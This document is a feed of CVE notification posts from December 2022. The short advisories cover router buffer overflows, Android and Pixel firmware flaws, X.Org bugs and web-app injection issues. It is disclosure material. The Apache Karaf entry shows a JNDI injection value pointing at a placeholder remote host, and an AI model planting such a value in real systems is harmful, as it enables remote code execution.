🚨 CVE-2022-44499Adobe Illustrator versions 26.5.1 (and earlier), and 27.0 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2022-12-21 20:29:37 |
🚨 CVE-2022-44500Adobe Illustrator versions 26.5.1 (and earlier), and 27.0 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2022-12-21 17:29:58 |
🚨 CVE-2022-46547Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the page parameter at /goform/VirtualSer.🎖@cveNotify |
|
| 2022-12-21 17:29:57 |
🚨 CVE-2022-46544Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the cmdinput parameter at /goform/exeCommand.🎖@cveNotify |
|
| 2022-12-21 17:29:55 |
🚨 CVE-2022-46545Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the page parameter at /goform/NatStaticSetting.🎖@cveNotify |
|
| 2022-12-21 17:29:54 |
🚨 CVE-2022-46546Tenda F1203 V2.0.1.6 was discovered to contain a buffer overflow via the entrys parameter at /goform/RouteStatic.🎖@cveNotify |
|
| 2022-12-21 17:29:53 |
🚨 CVE-2022-42510In StringsRequestData::encode of requestdata.cpp, there is a possible out of bounds read due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-241762656References: N/A🎖@cveNotify |
|
| 2022-12-21 17:29:52 |
🚨 CVE-2022-42509In CallDialReqData::encode of callreqdata.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-241544307References: N/A🎖@cveNotify |
|
| 2022-12-21 17:29:51 |
🚨 CVE-2022-25628An authenticated user can perform XML eXternal Entity injection in Management Console in Symantec Identity Manager 14.4🎖@cveNotify |
|
| 2022-12-21 17:29:50 |
🚨 CVE-2022-42508In ProtocolCallBuilder::BuildSendUssd of protocolcallbuilder.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-241388966References: N/A🎖@cveNotify |
|
| 2022-12-21 17:29:49 |
🚨 CVE-2022-25627An authenticated administrator who has physical access to the environment can carry out Remote Command Execution on Management Console in Symantec Identity Manager 14.4🎖@cveNotify |
|
| 2022-12-21 17:29:48 |
🚨 CVE-2022-25626An unauthenticated user can access Identity Manager’s management console specific page URLs. However, the system doesn’t allow the user to carry out server side tasks without a valid web session.🎖@cveNotify |
|
| 2022-12-21 17:29:47 |
🚨 CVE-2022-20610In cellular modem firmware, there is a possible out of bounds read due to a missing bounds check. This could lead to remote code execution with LTE authentication needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-240462530References: N/A🎖@cveNotify |
|
| 2022-12-21 17:29:46 |
🚨 CVE-2022-20609In Pixel cellular firmware, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-239240808References: N/A🎖@cveNotify |
|
| 2022-12-21 17:29:44 |
🚨 CVE-2022-20608In Pixel cellular firmware, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-239239246References: N/A🎖@cveNotify |
|
| 2022-12-21 17:29:43 |
🚨 CVE-2022-42855A logic issue was addressed with improved state management. This issue is fixed in tvOS 16.2, macOS Monterey 12.6.2, macOS Ventura 13.1, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.2 and iPadOS 16.2. An app may be able to use arbitrary entitlements.🎖@cveNotify |
|
| 2022-12-21 17:29:42 |
🚨 CVE-2022-32945An access issue was addressed with additional sandbox restrictions on third-party apps. This issue is fixed in macOS Ventura 13. An app may be able to record audio with paired AirPods.🎖@cveNotify |
|
| 2022-12-21 17:29:41 |
🚨 CVE-2022-20607In the Pixel cellular firmware, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with LTE authentication needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-238914868References: N/A🎖@cveNotify |
|
| 2022-12-21 17:29:40 |
🚨 CVE-2022-43484TERASOLUNA Global Framework 1.0.0 (Public review version) and TERASOLUNA Server Framework for Java (Rich) 2.0.0.2 to 2.0.5.1 are vulnerable to a ClassLoader manipulation vulnerability due to using the old version of Spring Framework which contains the vulnerability.The vulnerability is caused by an improper input validation issue in the binding mechanism of Spring MVC. By the application processing a specially crafted file, arbitrary code may be executed with the privileges of the application.🎖@cveNotify |
|
| 2022-12-21 17:29:39 |
🚨 CVE-2013-0791The CERT_DecodeCertPackage function in Mozilla Network Security Services (NSS), as used in Mozilla Firefox before 20.0, Firefox ESR 17.x before 17.0.5, Thunderbird before 17.0.5, Thunderbird ESR 17.x before 17.0.5, SeaMonkey before 2.17, and other products, allows remote attackers to cause a denial of service (out-of-bounds read and memory corruption) via a crafted certificate.🎖@cveNotify |
|
| 2022-12-21 17:29:38 |
🚨 CVE-2022-40145This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8🎖@cveNotify |
|
| 2022-12-21 17:29:37 |
🚨 CVE-2022-42514In ProtocolImsBuilder::BuildSetConfig of protocolimsbuilder.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-241763298References: N/A🎖@cveNotify |
|
| 2022-12-21 15:29:59 |
🚨 CVE-2022-46392An issue was discovered in Mbed TLS before 2.28.2 and 3.x before 3.3.0. An adversary with access to precise enough information about memory accesses (typically, an untrusted operating system attacking a secure enclave) can recover an RSA private key after observing the victim performing a single private-key operation, if the window size (MBEDTLS_MPI_WINDOW_SIZE) used for the exponentiation is 3 or smaller.🎖@cveNotify |
|
| 2022-12-21 15:29:58 |
🚨 CVE-2022-46701The issue was addressed with improved bounds checks. This issue is fixed in iOS 16.2 and iPadOS 16.2, macOS Ventura 13.1, tvOS 16.2. Connecting to a malicious NFS server may lead to arbitrary code execution with kernel privileges.🎖@cveNotify |
|
| 2022-12-21 15:29:57 |
🚨 CVE-2022-46697An out-of-bounds access issue was addressed with improved bounds checking. This issue is fixed in macOS Ventura 13.1. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2022-12-21 15:29:56 |
🚨 CVE-2022-20605In SAECOMM_CopyBufferBytes of SAECOMM_Utility.c, there is a possible out of bounds read due to an incorrect bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-231722405References: N/A🎖@cveNotify |
|
| 2022-12-21 15:29:55 |
🚨 CVE-2022-45338An arbitrary file upload vulnerability in the profile picture upload function of Exact Synergy Enterprise 267 before 267SP13 and Exact Synergy Enterprise 500 before 500SP6 allows attackers to execute arbitrary code via a crafted SVG file.🎖@cveNotify |
|
| 2022-12-21 15:29:51 |
🚨 CVE-2022-40004Cross Site Scripting (XSS) vulnerability in Things Board 3.4.1 allows remote attackers to escalate privilege via crafted URL to the Audit Log.🎖@cveNotify |
|
| 2022-12-21 15:29:50 |
🚨 CVE-2022-46634TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the wscDisabled parameter in the setting/setWiFiWpsCfg function.🎖@cveNotify |
|
| 2022-12-21 15:29:49 |
🚨 CVE-2022-20508In onAttach of ConfigureWifiSettings.java, there is a possible way for a guest user to change WiFi settings due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-218679614🎖@cveNotify |
|
| 2022-12-21 15:29:48 |
🚨 CVE-2022-20510In getNearbyNotificationStreamingPolicy of DevicePolicyManagerService.java, there is a possible way to learn about the notification streaming policy of other users due to a permissions bypass. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-235822336🎖@cveNotify |
|
| 2022-12-21 15:29:47 |
🚨 CVE-2022-4527A vulnerability was found in collective.task up to 3.0.9. It has been classified as problematic. This affects the function renderCell/AssignedGroupColumn of the file src/collective/task/browser/table.py. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 3.0.10 is able to address this issue. The name of the patch is 1aac7f83fa2c2b41d59ba02748912953461f3fac. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-215907.🎖@cveNotify |
|
| 2022-12-21 15:29:45 |
🚨 CVE-2022-38060A privilege escalation vulnerability exists in the sudo functionality of OpenStack Kolla git master 05194e7618. A misconfiguration in /etc/sudoers within a container can lead to increased privileges.🎖@cveNotify |
|
| 2022-12-21 15:29:44 |
🚨 CVE-2022-47635Wildix WMS 6 before 6.02.20221216, WMS 5 before 5.04.20221214, and WMS4 before 4.04.45396.23 allows Server-side request forgery (SSRF) via ZohoClient.php.🎖@cveNotify |
|
| 2022-12-21 15:29:43 |
🚨 CVE-2022-43543KDDI +Message App, NTT DOCOMO +Message App, and SoftBank +Message App contain a vulnerability caused by improper handling of Unicode control characters. +Message App displays text unprocessed, even when control characters are contained, and the text is shown based on Unicode control character's specifications. Therefore, a crafted text may display misleading web links. As a result, a spoofed URL may be displayed and phishing attacks may be conducted. Affected products and versions are as follows: KDDI +Message App for Android prior to version 3.9.2 and +Message App for iOS prior to version 3.9.4, NTT DOCOMO +Message App for Android prior to version 54.49.0500 and +Message App for iOS prior to version 3.9.4, and SoftBank +Message App for Android prior to version 12.9.5 and +Message App for iOS prior to version 3.9.4🎖@cveNotify |
|
| 2022-12-21 15:29:39 |
🚨 CVE-2022-44449Stored cross-site scripting vulnerability in Zenphoto versions prior to 1.6 allows remote a remote authenticated attacker with an administrative privilege to inject an arbitrary script.🎖@cveNotify |
|
| 2022-12-21 15:29:38 |
🚨 CVE-2022-46282Use after free vulnerability in CX-Drive V3.00 and earlier allows a local attacker to execute arbitrary code by having a user to open a specially crafted file,🎖@cveNotify |
|
| 2022-12-21 15:29:37 |
🚨 CVE-2022-46662Roxio Creator LJB starts another program with an unquoted file path. Since a registered Windows service path contains spaces and are unquoted, if a malicious executable is placed on a certain path, the executable may be executed with the privilege of the Windows service. The affected product and versions are as follows: Roxio Creator LJB version number 12.2 build number 106B62B, version number 12.2 build number 106B63A, version number 12.2 build number 106B69A, version number 12.2 build number 106B71A, and version number 12.2 build number 106B74A)🎖@cveNotify |
|
| 2022-12-21 15:29:36 |
🚨 CVE-2022-4617Cross-site Scripting (XSS) - Reflected in GitHub repository microweber/microweber prior to 1.3.2.🎖@cveNotify |
|
| 2022-12-21 07:30:12 |
🚨 CVE-2022-20596In sendChunk of WirelessCharger.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-239700400References: N/A🎖@cveNotify |
|
| 2022-12-21 07:30:10 |
🚨 CVE-2022-20600In TBD of TBD, there is a possible out of bounds write due to memory corruption. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-239847859References: N/A🎖@cveNotify |
|
| 2022-12-21 07:30:08 |
🚨 CVE-2022-20592In ppmp_validate_secbuf of drm_fw.c, there is a possible information disclosure due to improper input validation. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-238976908References: N/A🎖@cveNotify |
|
| 2022-12-21 07:30:07 |
🚨 CVE-2022-20594In updateStart of WirelessCharger.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-239567689References: N/A🎖@cveNotify |
|
| 2022-12-21 07:30:05 |
🚨 CVE-2022-20587In ppmp_validate_wsm of drm_fw.c, there is a possible EoP due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-238720411References: N/A🎖@cveNotify |
|
| 2022-12-21 07:30:03 |
🚨 CVE-2022-20588In sysmmu_map of sysmmu.c, there is a possible EoP due to a precondition check failure. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-238785915References: N/A🎖@cveNotify |
|
| 2022-12-21 07:30:01 |
🚨 CVE-2022-20589In valid_va_secbuf_check of drm_access_control.c, there is a possible ID due to improper input validation. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-238841928References: N/A🎖@cveNotify |
|
| 2022-12-21 07:29:59 |
🚨 CVE-2022-20590In valid_va_sec_mfc_check of drm_access_control.c, there is a possible information disclosure due to improper input validation. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-238932493References: N/A🎖@cveNotify |
|
| 2022-12-21 07:29:58 |
🚨 CVE-2022-20591In ppmpu_set of ppmpu.c, there is a possible information disclosure due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-238939706References: N/A🎖@cveNotify |
|
| 2022-12-21 07:29:56 |
🚨 CVE-2022-20593In pop_descriptor_string of BufferDescriptor.h, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-239415809References: N/A🎖@cveNotify |
|
| 2022-12-21 07:29:55 |
🚨 CVE-2022-20582In ppmp_unprotect_mfcfw_buf of drm_fw.c, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-233645166References: N/A🎖@cveNotify |
|
| 2022-12-21 07:29:53 |
🚨 CVE-2022-20583In ppmp_unprotect_mfcfw_buf of drm_fw.c, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege in S-EL1 with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-234859169References: N/A🎖@cveNotify |
|
| 2022-12-21 07:29:52 |
🚨 CVE-2022-20584In page_number of shared_mem.c, there is a possible code execution in secure world due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-238366009References: N/A🎖@cveNotify |
|
| 2022-12-21 07:29:49 |
🚨 CVE-2022-20585In valid_out_of_special_sec_dram_addr of drm_access_control.c, there is a possible EoP due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-238716781References: N/A🎖@cveNotify |
|
| 2022-12-21 07:29:47 |
🚨 CVE-2022-20586In valid_out_of_special_sec_dram_addr of drm_access_control.c, there is a possible EoP due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-238718854References: N/A🎖@cveNotify |
|
| 2022-12-21 07:29:45 |
🚨 CVE-2022-46340A vulnerability was found in X.Org. This security flaw occurs becuase the swap handler for the XTestFakeInput request of the XTest extension may corrupt the stack if GenericEvents with lengths larger than 32 bytes are sent through a the XTestFakeInput request. This issue can lead to local privileges elevation on systems where the X server is running privileged and remote code execution for ssh X forwarding sessions. This issue does not affect systems where client and server use the same byte order.🎖@cveNotify |
|
| 2022-12-21 07:29:43 |
🚨 CVE-2022-46341A vulnerability was found in X.Org. This security flaw occurs because the handler for the XIPassiveUngrab request accesses out-of-bounds memory when invoked with a high keycode or button code. This issue can lead to local privileges elevation on systems where the X server is running privileged and remote code execution for ssh X forwarding sessions.🎖@cveNotify |
|
| 2022-12-21 07:29:41 |
🚨 CVE-2022-46342A vulnerability was found in X.Org. This security flaw occurs because the handler for the XvdiSelectVideoNotify request may write to memory after it has been freed. This issue can lead to local privileges elevation on systems where the X se🎖@cveNotify |
|
| 2022-12-21 07:29:40 |
🚨 CVE-2022-46343A vulnerability was found in X.Org. This security flaw occurs because the handler for the ScreenSaverSetAttributes request may write to memory after it has been freed. This issue can lead to local privileges elevation on systems where the X server is running privileged and remote code execution for ssh X forwarding sessions.🎖@cveNotify |
|
| 2022-12-21 07:29:38 |
🚨 CVE-2022-46344A vulnerability was found in X.Org. This security flaw occurs because the handler for the XIChangeProperty request has a length-validation issues, resulting in out-of-bounds memory reads and potential information disclosure. This issue can lead to local privileges elevation on systems where the X server is running privileged and remote code execution for ssh X forwarding sessions.🎖@cveNotify |
|
| 2022-12-21 00:30:00 |
🚨 CVE-2021-24728The Membership & Content Restriction – Paid Member Subscriptions WordPress plugin before 2.4.2 did not sanitise, validate or escape its order and orderby parameters before using them in SQL statement, leading to Authenticated SQL Injections in the Members and Payments pages.🎖@cveNotify |
|
| 2022-12-21 00:29:59 |
🚨 CVE-2022-20570Product: AndroidVersions: Android kernelAndroid ID: A-230660904References: N/A🎖@cveNotify |
|
| 2022-12-21 00:29:58 |
🚨 CVE-2022-20566In l2cap_chan_put of l2cap_core, there is a possible use after free due to improper locking. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-165329981References: Upstream kernel🎖@cveNotify |
|
| 2022-12-21 00:29:57 |
🚨 CVE-2021-39173Cachet is an open source status page system. Prior to version 2.5.1 authenticated users, regardless of their privileges (User or Admin), can trick Cachet and install the instance again, leading to arbitrary code execution on the server. This issue was addressed in version 2.5.1 by improving the middleware `ReadyForUse`, which now performs a stricter validation of the instance name. As a workaround, only allow trusted source IP addresses to access to the administration dashboard.🎖@cveNotify |
|
| 2022-12-21 00:29:53 |
🚨 CVE-2021-24581The Blue Admin WordPress plugin through 21.06.01 does not sanitise or escape its "Logo Title" setting before outputting in a page, leading to a Stored Cross-Site Scripting issue. Furthermore, the plugin does not have CSRF check in place when saving its settings, allowing the issue to be exploited via a CSRF attack.🎖@cveNotify |
|
| 2022-12-21 00:29:52 |
🚨 CVE-2022-20563In TBD of ufdt_convert, there is a possible out of bounds read due to memory corruption. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-242067561References: N/A🎖@cveNotify |
|
| 2022-12-21 00:29:51 |
🚨 CVE-2022-20561In TBD of aud_hal_tunnel.c, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-222162870References: N/A🎖@cveNotify |
|
| 2022-12-21 00:29:47 |
🚨 CVE-2022-46312The application management module has a vulnerability in permission verification. Successful exploitation of this vulnerability causes unexpected clear of device applications.🎖@cveNotify |
|
| 2022-12-21 00:29:46 |
🚨 CVE-2022-23542OpenFGA is an authorization/permission engine built for developers and inspired by Google Zanzibar. During an internal security assessment, it was discovered that OpenFGA version 0.3.0 is vulnerable to authorization bypass under certain conditions. This issue has been patched in version 0.3.1 and is backward compatible.🎖@cveNotify |
|
| 2022-12-21 00:29:45 |
🚨 CVE-2022-38391IBM Spectrum Control 5.4 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 233982.🎖@cveNotify |
|
| 2022-12-21 00:29:41 |
🚨 CVE-2022-39166IBM Security Guardium 11.4 could allow a privileged user to obtain sensitive information inside of an HTTP response. IBM X-Force ID: 235405.🎖@cveNotify |
|
| 2022-12-21 00:29:40 |
🚨 CVE-2022-41591The backup module has a path traversal vulnerability. Successful exploitation of this vulnerability causes unauthorized access to other system files.🎖@cveNotify |
|
| 2022-12-21 00:29:39 |
🚨 CVE-2022-41596The system tool has inconsistent serialization and deserialization. Successful exploitation of this vulnerability will cause unauthorized startup of components.🎖@cveNotify |
|
| 2022-12-20 22:30:04 |
🚨 CVE-2022-4515A flaw was found in Exuberant Ctags in the way it handles the "-o" option. This option specifies the tag filename. A crafted tag filename specified in the command line or in the configuration file results in arbitrary command execution because the externalSortTags() in sort.c calls the system(3) function in an unsafe way.🎖@cveNotify |
|
| 2022-12-20 22:30:03 |
🚨 CVE-2022-38873D-Link devices DAP-2310 v2.10rc036 and earlier, DAP-2330 v1.06rc020 and earlier, DAP-2360 v2.10rc050 and earlier, DAP-2553 v3.10rc031 and earlier, DAP-2660 v1.15rc093 and earlier, DAP-2690 v3.20rc106 and earlier, DAP-2695 v1.20rc119_beta31 and earlier, DAP-3320 v1.05rc027 beta and earlier, DAP-3662 v1.05rc047 and earlier allows attackers to cause a Denial of Service (DoS) via uploading a crafted firmware after modifying the firmware header.🎖@cveNotify |
|
| 2022-12-20 22:30:02 |
🚨 CVE-2022-39304ghinstallation provides transport, which implements http.RoundTripper to provide authentication as an installation for GitHub Apps. In ghinstallation version 1, when the request to refresh an installation token failed, the HTTP request and response would be returned for debugging. The request contained the bearer JWT for the App, and was returned back to clients. This token is short lived (10 minute maximum). This issue has been patched and is available in version 2.0.0.🎖@cveNotify |
|
| 2022-12-20 22:30:01 |
🚨 CVE-2022-46139TP-Link TL-WR940N V4 3.16.9 and earlier allows authenticated attackers to cause a Denial of Service (DoS) via uploading a crafted firmware image during the firmware update process.🎖@cveNotify |
|
| 2022-12-20 22:29:59 |
🚨 CVE-2022-46423An exploitable firmware modification vulnerability was discovered on the Netgear WNR2000v1 router. An attacker can conduct a MITM (Man-in-the-Middle) attack to modify the user-uploaded firmware image and bypass the CRC check, allowing attackers to execute arbitrary code or cause a Denial of Service (DoS). This affects v1.2.3.7 and earlier.🎖@cveNotify |
|
| 2022-12-20 22:29:58 |
🚨 CVE-2022-46424An exploitable firmware modification vulnerability was discovered on the Netgear XWN5001 Powerline 500 WiFi Access Point. An attacker can conduct a MITM (Man-in-the-Middle) attack to modify the user-uploaded firmware image and bypass the CRC check, allowing attackers to execute arbitrary code or cause a Denial of Service (DoS). This affects v0.4.1.1 and earlier.🎖@cveNotify |
|
| 2022-12-20 22:29:56 |
🚨 CVE-2022-46428TP-Link TL-WR1043ND V1 3.13.15 and earlier allows authenticated attackers to execute arbitrary code or cause a Denial of Service (DoS) via uploading a crafted firmware image during the firmware update process.🎖@cveNotify |
|
| 2022-12-20 22:29:55 |
🚨 CVE-2022-46430TP-Link TL-WR740N V1 and V2 v3.12.4 and earlier allows authenticated attackers to execute arbitrary code or cause a Denial of Service (DoS) via uploading a crafted firmware image during the firmware update process.🎖@cveNotify |
|
| 2022-12-20 22:29:54 |
🚨 CVE-2022-46432An exploitable firmware modification vulnerability was discovered on TP-Link TL-WR743ND V1. An attacker can conduct a MITM (Man-in-the-Middle) attack to modify the user-uploaded firmware image and bypass the CRC check, allowing attackers to execute arbitrary code or cause a Denial of Service (DoS). This affects v3.12.20 and earlier.🎖@cveNotify |
|
| 2022-12-20 22:29:53 |
🚨 CVE-2022-46434An issue in the firmware update process of TP-Link TL-WA7510N v1 v3.12.6 and earlier allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via uploading a crafted firmware image.🎖@cveNotify |
|
| 2022-12-20 22:29:52 |
🚨 CVE-2022-46435An issue in the firmware update process of TP-Link TL-WR941ND V2/V3 up to 3.13.9 and TL-WR941ND V4 up to 3.12.8 allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via uploading a crafted firmware image.🎖@cveNotify |
|
| 2022-12-20 22:29:50 |
🚨 CVE-2022-46771IBM UrbanCode Deploy (UCD) 6.2.0.0 through 6.2.7.18, 7.0.5.0 through 7.0.5.13, 7.1.0.0 through 7.1.2.9, 7.2.0.0 through 7.2.3.2 and 7.3.0.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 242273.🎖@cveNotify |
|
| 2022-12-20 22:29:49 |
🚨 CVE-2022-46910An issue in the firmware update process of TP-Link TL-WA901ND V1 up to v3.11.2 and TL-WA901N V2 up to v3.12.16 allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via uploading a crafted firmware image.🎖@cveNotify |
|
| 2022-12-20 22:29:48 |
🚨 CVE-2022-46912An issue in the firmware update process of TP-Link TL-WR841N / TL-WA841ND V7 3.13.9 and earlier allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via uploading a crafted firmware image.🎖@cveNotify |
|
| 2022-12-20 22:29:47 |
🚨 CVE-2022-46914An issue in the firmware update process of TP-LINK TL-WA801N / TL-WA801ND V1 v3.12.16 and earlier allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via uploading a crafted firmware image.🎖@cveNotify |
|
| 2022-12-20 22:29:46 |
🚨 CVE-2022-46076D-Link DIR-869 DIR869Ax_FW102B15 is vulnerable to Authentication Bypass via phpcgi.🎖@cveNotify |
|
| 2022-12-20 22:29:45 |
🚨 CVE-2022-4513A vulnerability, which was classified as problematic, has been found in European Environment Agency eionet.contreg. This issue affects some unknown processing. The manipulation of the argument searchTag/resourceUri leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 2022-06-27T0948 is able to address this issue. The name of the patch is a120c2153e263e62c4db34a06ab96a9f1c6bccb6. It is recommended to upgrade the affected component. The identifier VDB-215885 was assigned to this vulnerability.🎖@cveNotify |
|
| 2022-12-20 22:29:43 |
🚨 CVE-2022-4511A vulnerability has been found in RainyGao DocSys and classified as critical. Affected by this vulnerability is an unknown functionality of the component com.DocSystem.controller.UserController#getUserImg. The manipulation leads to path traversal: '../filedir'. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-215851.🎖@cveNotify |
|
| 2022-12-20 22:29:42 |
🚨 CVE-2022-20514In acquireFabricatedOverlayIterator, nextFabricatedOverlayInfos, and releaseFabricatedOverlayIterator of Idmap2Service.cpp, there is a possible out of bounds write due to a use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-245727875🎖@cveNotify |
|
| 2022-12-20 19:30:02 |
🚨 CVE-2021-35252Common encryption key appears to be used across all deployed instances of Serv-U FTP Server. Because of this an encrypted value that is exposed to an attacker can be simply recovered to plaintext.🎖@cveNotify |
|
| 2022-12-20 19:30:01 |
🚨 CVE-2022-3109An issue was discovered in the FFmpeg through 3.0. vp3_decode_frame in libavcodec/vp3.c lacks check of the return value of av_malloc() and will cause the null pointer dereference, impacting confidentiality and availability.🎖@cveNotify |
|
| 2022-12-20 19:30:00 |
🚨 CVE-2022-4555The WP Shamsi plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the deactivate() function hooked via init() in versions up to, and including, 4.1.0. This makes it possible for unauthenticated attackers to deactivate arbitrary plugins on the site. This can be used to deactivate security plugins that aids in exploiting other vulnerabilities.🎖@cveNotify |
|
| 2022-12-20 19:29:59 |
🚨 CVE-2022-41963BigBlueButton is an open source web conferencing system. Versions prior to 2.4.3 contain a whiteboard grace period that exists to handle delayed messages, but this grace period could be used by attackers to take actions in the few seconds after their access is revoked. The attacker must be a meeting participant. This issue is patched in version 2.4.3 an version 2.5-alpha-1🎖@cveNotify |
|
| 2022-12-20 19:29:55 |
🚨 CVE-2022-36223In Emby Server 4.6.7.0, the playlist name field is vulnerable to XSS stored where it is possible to steal the administrator access token and flip or steal the media server administrator account.🎖@cveNotify |
|
| 2022-12-20 19:29:54 |
🚨 CVE-2022-20509In mapGrantorDescr of MessageQueueBase.h, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-244713317🎖@cveNotify |
|
| 2022-12-20 19:29:53 |
🚨 CVE-2022-20511In getNearbyAppStreamingPolicy of DevicePolicyManagerService.java, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-235821829🎖@cveNotify |
|
| 2022-12-20 19:29:49 |
🚨 CVE-2022-20506In onCreate of WifiDialogActivity.java, there is a missing permission check. This could lead to local escalation of privilege from a guest user with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-226133034🎖@cveNotify |
|
| 2022-12-20 19:29:48 |
🚨 CVE-2022-20505In openFile of CallLogProvider.java, there is a possible permission bypass due to a path traversal error. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitationProduct: AndroidVersions: Android-13Android ID: A-225981754🎖@cveNotify |
|
| 2022-12-20 19:29:47 |
